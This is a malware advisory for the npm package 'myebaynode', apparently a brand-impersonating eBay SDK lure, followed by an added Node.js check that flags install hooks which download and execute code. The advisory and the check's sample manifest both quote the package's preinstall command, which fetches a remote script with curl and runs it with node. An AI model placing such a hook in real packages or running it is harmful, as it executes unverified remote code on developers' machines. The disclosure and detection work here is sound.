MAL-2026-6296

Malicious code in myebaynode (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (12d56c05672731322d45fb9273fb782a6b8042260fb019b2d96c755eed084fc3)

package.json declares a preinstall lifecycle hook that runs `curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js`, fetching JavaScript from an external, mutable, personal domain and immediately executing it under the installer's user account on `npm install`. The fetched payload is unpinned (no hash or signature verification), can be changed by the host's owner at any time, and runs with full filesystem and network access of the installing user. The package name 'myebaynode' with description 'Ebay Node Package', version 99.0.0, and minimal metadata (author 'aman', no repository) suggests brand-impersonation intended to lure developers searching for an eBay SDK.
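As an added example (not part of the advisory or of the scanner it cites), a Node.js check for the pattern described above: an install-time lifecycle hook that downloads content and then executes it. The hook list, the regexes, the `auditLifecycleScripts` name and the metadata heuristic are assumptions; the sample manifests are constructed from the advisory's description.

```javascript
// Added example: audit a parsed package.json for install-time hooks that
// fetch remote content, and rate them higher when they also execute something.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];
const FETCH_RE = /\b(curl|wget)\b|https?:\/\//i;           // network fetch
const EXEC_RE = /\b(node|sh|bash)\b|\|\s*(sh|bash)\b/i;     // runs an interpreter
const URL_RE = /https?:\/\/[^\s'"|;&]+/gi;

function auditLifecycleScripts(pkg) {
  const findings = [];
  const scripts = pkg.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string" || !FETCH_RE.test(cmd)) continue;
    findings.push({
      hook,
      command: cmd,
      urls: cmd.match(URL_RE) || [],
      // fetch + execute in one hook means unpinned remote code runs on install
      severity: EXEC_RE.test(cmd) ? "high" : "review",
      // weak supporting signal noted in the advisory: no repository field
      noRepository: !pkg.repository,
    });
  }
  return findings;
}

// Constructed sample mirroring the manifest the advisory describes.
const SAMPLE_FLAGGED = {
  name: "myebaynode",
  version: "99.0.0",
  description: "Ebay Node Package",
  author: "aman",
  scripts: {
    preinstall: "curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js",
  },
};

// Constructed benign sample: a local build step with no network fetch.
const SAMPLE_BENIGN = {
  name: "example-local-build",
  version: "1.2.3",
  repository: "github:example/example-local-build",
  scripts: { postinstall: "node scripts/build.js", test: "node test.js" },
};

console.log(JSON.stringify(auditLifecycleScripts(SAMPLE_FLAGGED), null, 2));
```

Installing with `npm install --ignore-scripts` keeps lifecycle hooks from running while a manifest is under review.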

Affected packages

npm / myebaynode

No fixed version published yet for myebaynode (npm). Pin to a known-safe version or switch to an alternative.
